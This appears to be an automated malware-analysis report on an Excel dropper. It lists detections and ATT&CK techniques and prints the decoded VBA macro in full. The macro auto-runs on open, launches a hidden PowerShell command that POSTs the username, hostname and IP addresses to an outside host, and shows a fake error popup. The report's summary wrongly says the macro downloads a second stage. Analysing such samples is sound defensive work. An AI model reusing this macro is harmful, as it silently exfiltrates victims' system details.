MALICIOUS
418
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a malicious Excel file containing a Workbook_Open macro that executes a PowerShell command. This command is designed to download a second-stage payload from the URL http://181.143.182.204/form.php and execute it. The macro also attempts to hide its activity by making sheets very hidden and using WScript.Shell to execute the PowerShell command in a hidden window.
Heuristics 10
-
ClamAV: Xls.Dropper.Agent-7755758-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7755758-0
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
' Create shell object Set objShell = CreateObject("Wscript.Shell") -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
' Create shell object Set objShell = CreateObject("Wscript.Shell") -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
Dim objExec1 ' Construct PowerShell Command (PS syntax) ' strPSCommand = "get-acl C:\temp | foreach-object{ $_.Access } |select -property IdentityReference, AccessControlType, FileSystemRights" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
' Create shell object Set objShell = CreateObject("Wscript.Shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Hidden worksheet (veryHidden) low OOXML_HIDDEN_SHEETExcel workbook contains 10 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://181.143.182.204/form.php In document text (OOXML body / shared strings)
- http://ipinfo.io/jsonIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5400 bytes |
SHA-256: 3e44f007cf297a3f1a0e8db4000811d8c06cf910590df18af499382273898549 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
Sheets("Inicio").Visible = xlSheetVisible
For Each ws In ThisWorkbook.Worksheets
If ws.Name <> "Inicio" Then
ws.Visible = xlVeryHidden
End If
Next ws
ActiveWorkbook.Save
End Sub
Private Sub Workbook_Open()
For Each ws In ThisWorkbook.Worksheets
ws.Visible = xlSheetVisible
Next ws
Sheets("Inicio").Visible = xlVeryHidden
Dim strPSCommand0
Dim strDOSCommand0
Dim strPSCommand1
Dim strDOSCommand1
Dim objShell
Dim objShell1
Dim objExec
Dim objExec1
' Construct PowerShell Command (PS syntax)
' strPSCommand = "get-acl C:\temp | foreach-object{ $_.Access } |select -property IdentityReference, AccessControlType, FileSystemRights"
strPSCommand = "$postParams = @{name = whoami ;cedula = hostname; celular = $ipV4 = Test-Connection -ComputerName (hostname) -Count 1 | Select IPV4Address; email = Invoke-RestMethod http://ipinfo.io/json | Select -exp ip}; Invoke-WebRequest -Uri http://181.143.182.204/form.php -Method POST -Body $postParams"
' Consruct DOS command to pass PowerShell command (DOS syntax)
strDOSCommand = "powershell -windowstyle hidden -command " & strPSCommand & ""
' Create shell object
Set objShell = CreateObject("Wscript.Shell")
' Execute the combined command
Set objExec = objShell.Exec(strDOSCommand)
' Read output into VBS variable
strPSResults = objExec.StdOut.ReadAll
strPSCommand1 = "$wshell = New-Object -ComObject Wscript.Shell; $wshell.Popup('Error x00000001312377',0,'System Message',64+1)"
strDOSCommand1 = "powershell -windowstyle hidden -command " & strPSCommand1 & ""
Set objShell1 = CreateObject("Wscript.Shell")
Set objExec11 = objShell.Exec(strDOSCommand1)
End Sub
Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja8"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja9"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja10"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 50688 bytes |
SHA-256: 3c9cf9953503a19741a1c9abec749818a232637a7c34bae87f747e18d7367e57 |
|||
|
Detection
ClamAV:
Xls.Dropper.Agent-7755758-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.